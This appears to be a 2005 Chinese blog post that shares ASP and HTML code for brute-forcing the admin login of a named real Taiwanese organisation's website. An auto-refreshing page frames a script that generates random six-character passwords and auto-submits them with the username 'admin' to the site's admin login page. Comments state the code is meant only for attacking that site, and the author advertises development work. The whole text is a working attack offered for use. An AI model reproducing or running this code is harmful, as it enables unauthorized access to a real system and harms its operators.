攻擊設計網的ASP代碼
作者:tank 日期:2005-01-23
攻擊設計網的ASP代碼
作者:bigbird998(沈家峰) http://blog.csdn.net/bigbird998/
運行test.htm後進行密碼登陸測試~!
-------------------------test.htm代碼如下:
<HTML>
<HEAD>
<TITLE></TITLE>
<meta HTTP-EQUIV="refresh" CONTENT="5">
</HEAD>
<BODY>
<iframe src="test.asp" width=859 height=406 name="top" frameborder=0 marginwidth="1"
marginheight="1" border="0" scrolling="no"></iframe>
</body>
</html>
--------------------------test.asp代碼如下:
<%
'本代碼只供攻擊該臺灣網站使用,請不要在國內站點進行測試
'沒進行隨機代碼重複限制
'承接網絡項目開發,業務聯繫QQ:61795
'MSN:bigbird998@hotmail.com
Function RoundStr(StrLng)
TmpStr = "0123456789abcdefghijklmnopqrstopwxyz"
'TmpStr = "0123456789"
for jjj = 1 to StrLng
Randomize
strLen = Len(TmpStr)
t = Round((RND * (strLen-1))+1)
s = s & mid(TmpStr,t,1)
Next
RoundStr = s
End Function
a=RoundStr(6)
%>
<HTML>
<HEAD>
<TITLE></TITLE>
<META HTTP-EQUIV="expires" CONTENT="0">
</HEAD>
<BODY topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<form method="POST" action="http://www.tsu.org.tw/admin/login.php" name="form1">
<font size=2><b>名稱:</b></font>
<INPUT NAME="Username" VALUE="admin" maxlength=256 size=25><font size=2><b> <font size=2><b>口令:</b></font>
<INPUT NAME="Password" VALUE="<%=a%>" TYPE=text maxlength=256 size=25>
<INPUT TYPE=submit VALUE="登 錄"></FORM>
<p>當前測試的密碼為:<font style=font:100pt><b><%=a%></b></font></p>
</BODY>
</HTML>
<script language="javascript">
<!--
this.document.forms[0].submit()
//-->
</script>